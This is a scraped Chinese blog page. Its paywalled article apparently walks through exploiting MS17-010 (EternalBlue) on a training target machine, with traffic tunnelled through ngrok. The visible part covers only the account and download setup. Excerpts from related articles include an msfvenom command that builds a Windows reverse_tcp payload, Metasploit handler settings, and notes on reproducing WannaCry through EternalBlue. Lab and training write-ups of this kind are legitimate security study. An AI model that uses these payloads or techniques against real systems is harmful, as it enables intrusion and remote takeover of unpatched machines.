Ms17-010进行WEB提权之实践下某培训靶机服务器

最新推荐文章于 2024-07-22 01:51:44 发布
最新推荐文章于 2024-07-22 01:51:44 发布
阅读量2.8k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoi123/article/details/80351493
版权
本文详细介绍了如何利用Ms17-010漏洞进行WEB提权,通过ngrok和sunny进行内网穿透。首先注册并配置ngrok和sunny,然后在Kali Linux中使用Msfvenom生成木马,通过靶机上传并执行获取shell。接着获取本地子网,添加路由,利用ms17_010_p**ec或eternalblue模块进行内网渗透。最后,通过新开的msf窗口监听并接收shell。
摘要由CSDN通过智能技术生成

前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方,一步,一步写清楚,文章如果看不懂?那写出来的意义何在?

ngrok与sunny都是匿名的好东西,此次攻击全程在kali下面完成,无需公网,并且使用的代理转发,都是一次性,So?下面开始

准备工作

1.Kali一台

2.ngrok账户注册:https://dashboard.ngrok.com/user/signup

3.sunny账户注册:https://www.ngrok.cc/

开始操作

1.开启Kali并且运行Msf

2.注册账户https://dashboard.ngrok.com/user/signup(用谷歌账户,或者git账户登陆就行了。)

image.png

下载:https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip

然后解压得到:

image.png

接着。

image.png

红色圈中填写就是

image.png

填写好了之后,回车,自动生成了一个 yml 的配置文件。

最低0.47元/天 解锁文章
张悠悠66
关注
ms17-010是什么漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-28 1959
MS17-010是一个安全类型的补丁。Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、ms17-010漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool
MS17-010漏洞
鱼珊珊
08-29 616
SMB(Server Message Block) 通信协议是微软(Microsoft)和因特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通信协议(客户端和服务器交互)。后来Linux移植了SMB,并称为samba. SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445 SMB协议,计算机可以访问网络资源,下载对应的资源文件。 nmap 扫描...
MS17-010漏洞复现+利用
最新发布
Nove1205的博客
07-22 1415
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
Try hack me——永恒之蓝——ms17-010
m_de_g的博客
01-08 5541
Try hack me——永恒之蓝 1.开启靶场 2.开启完成后,可以在右边进行测试,由于平台是外国人开发的,可以借助翻译软件进行翻译(如:有道词典) 一、Recon模块 1.根据提示回答问题,使用nmap扫描 2.我们直接使用nmap对靶机进行扫描 nmap -A -v 10.10.240.121 3.通过扫描,可以知道目标靶机,开放了135,139,445,3389,49152,49153,49154,49158,49160等多个端口 4.可以回答第二个问题 How many ports
ms17010漏洞利用(主机漏洞利用)
qq_38989921的博客
03-22 3634
攻击机:kali ip:192.168.248.129 靶机:win7 x64 enterprise ip: 192.168.248.130 启动msf, Msfconsole search ms 检查msf库里是否存在ms17-010漏洞 Nmap检测靶机开放端口:nmap –sV 192.168.248.130 445端口开放,存在攻击条件 配置exploit 设置目标ip 配置payload: 攻击: msf exploit(ms17_010_eternalblue) > exp
Windows系统提权简单总结
Aiwin的博客
07-13 1863
Windows系统提权简单总结
利用ms17-010漏洞提权
MzHeader的博客
03-27 3977
一、打开kali和win7查看IP。 (1) Windows7作为靶机 IP:192.168.43.109 (2) Kali作为攻击机(最新版kaili) IP:192.168.43.49 二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。 三、在kali中输入 msfconsole(等待一会可能会有点慢) 四、进入后输人search ms17-010(搜素攻击模块) 五...
【漏洞复现】MS17-010漏洞(永恒之蓝)复现
m0_53223419的博客
01-15 377
MS17-010漏洞复现,对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8626
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
ms17_010_psexec.rb
04-11
msfconsole中17010,永恒之蓝模块。获取权限必备
MS-08067自动扫描抓机
05-13
MS-08067自动扫描抓机MS-08067自动扫描抓机
Metasploit渗透测试(获取靶机控制权)
qq_51926773的博客
11-07 534
一,打开kali生成一个被控端: 输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe 这是你会发现你的kali会多出一个文件: 二,然后在kali输入msfconsole: 然后输入set payload windows/meterpreter/reverse_tcp,回车zai 再输入set lhost 靶机ip ...
MS17-010“永恒之蓝”漏洞复现与分析
m0_74887243的博客
01-15 503
MS17-010“永恒之蓝”漏洞复现
ms17-010直接拿meterpreter权限
qq_38240166的博客
03-07 8327
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
MS08-067漏洞 远程溢出入侵测试
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
03-06 5631
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击. 下面的实验为本地测试环境,...
利用MS17-010永恒之蓝漏洞攻破Win7靶机教程
永恒之蓝漏洞(MS17-010),也称为SMB EternalBlue,是2017年微软Windows系统中发现的一个高危漏洞,主要影响的是Server Message Block (SMB) 协议,这是一个在局域网中广泛使用的文件共享协议。该漏洞存在于Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值